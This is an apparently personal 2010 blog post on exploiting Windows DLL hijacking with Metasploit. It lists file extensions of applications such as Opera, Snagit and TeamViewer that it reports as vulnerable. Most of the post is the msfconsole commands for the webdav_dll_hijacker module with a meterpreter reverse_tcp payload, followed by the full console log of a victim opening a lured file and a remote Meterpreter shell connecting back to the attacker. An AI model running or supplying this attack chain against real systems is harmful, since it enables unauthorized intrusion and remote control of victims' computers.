Tuesday, August 24, 2010

DLL Hijacking and metasploit part 2

Adding some more common applications that are vulnerable,


( windows live contact ) .contact
( Windows live mail ) .eml
( Opera ) .htm .html .mht .mhtml .xht .xhtm .xhtl
( Windows live mail ) .nws .rss
( Snagit ) .snag
( Snagit accessories ) .results
( Snagit profiles ) .snagprof
( Teamviewer ) .tvc .tvs
( Opera widgets ) .wgt

DLL Hijacking and metasploit

Following the excellent post on exploiting DLL hijacking from hdm ( http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html) i made an initial list of file extensions that are exploitable under windows xp sp3 clean install.

Currently the list consist of only four extensions, except .exe files and they are the following:

( group management ) .grp
( Digital ID File ) .p7c
( vCards ) .vcf
( address book files) .wab

Creating an extension list from the above, and using metasploit, we have the following :

./msfconsole
msf >  use exploit/windows/browser/webdav_dll_hijacker
msf exploit(webdav_dll_hijacker) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(webdav_dll_hijacker) > set EXTENSIONS "grp p7c vcf wab"               
msf exploit(webdav_dll_hijacker) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on xxx.xxx.xxx.xxx:4444
[*]
[*] Exploit links are now available at \\xxx.xxx.xxx.xxx\documents\
[*]
[*] Using URL: http://xxx.xxx.xxx.xxx:80/
[*] Server started.

Now at the windows xp system from internet explorer we browse to the site above and after awhile a folder with several documents having the specified extensions will appear. Clicking on any of them will cause the following on the metasploit console:


msf exploit(webdav_dll_hijacker) > [*] yyy.yyy.yyy.yyy:27383 GET => REDIRECT (/)
[*] yyy.yyy.yyy.yyy:27383 GET => DATA (/favicon.ico)
[*] yyy.yyy.yyy.yyy:27482 OPTIONS /
[*] yyy.yyy.yyy.yyy:27482 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27482 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27482 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27482 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27482 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27482 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27485 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27485 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27485 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27485 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27485 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/desktop.ini
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 404 (/documents/desktop.ini)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27649 PROPFIND /documents/policy.p7c
[*] yyy.yyy.yyy.yyy:27649 PROPFIND => 207 File (/documents/policy.p7c)
[*] yyy.yyy.yyy.yyy:27650 PROPFIND /documents/wab32res.dll
[*] yyy.yyy.yyy.yyy:27650 PROPFIND => 207 File (/documents/wab32res.dll)
[*] yyy.yyy.yyy.yyy:27649 PROPFIND /DOCUMENTS
[*] yyy.yyy.yyy.yyy:27649 PROPFIND => 301 (/DOCUMENTS)
[*] yyy.yyy.yyy.yyy:27650 GET => DLL Payload
[*] yyy.yyy.yyy.yyy:27649 PROPFIND /DOCUMENTS/
[*] yyy.yyy.yyy.yyy:27649 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] yyy.yyy.yyy.yyy:27649 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27650 PROPFIND /documents/rundll32.exe
[*] yyy.yyy.yyy.yyy:27650 PROPFIND => 404 (/documents/rundll32.exe)
[*] yyy.yyy.yyy.yyy:27652 PROPFIND /DOCUMENTS
[*] yyy.yyy.yyy.yyy:27652 PROPFIND => 301 (/DOCUMENTS)
[*] yyy.yyy.yyy.yyy:27650 PROPFIND /DOCUMENTS/
[*] yyy.yyy.yyy.yyy:27650 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] yyy.yyy.yyy.yyy:27650 PROPFIND => 207 Top-Level Directory
[*] Sending stage (748544 bytes) to yyy.yyy.yyy.yyy
[*] yyy.yyy.yyy.yyy:27652 PROPFIND /documents/rsaenh.dll
[*] yyy.yyy.yyy.yyy:27652 PROPFIND => 207 File (/documents/rsaenh.dll)
[*] yyy.yyy.yyy.yyy:27652 GET => DLL Payload
[*] yyy.yyy.yyy.yyy:27656 PROPFIND /DOCUMENTS
[*] yyy.yyy.yyy.yyy:27656 PROPFIND => 301 (/DOCUMENTS)
[*] yyy.yyy.yyy.yyy:27652 PROPFIND /DOCUMENTS/
[*] yyy.yyy.yyy.yyy:27652 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] yyy.yyy.yyy.yyy:27652 PROPFIND => 207 Top-Level Directory
[*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:4444 -> yyy.yyy.yyy.yyy:27654) at Tue Aug 24 11:38:57 +0300 2010

And here we have a nice meterpreter session.

Next, installing programs on the target system to identify more products that are vulnerable.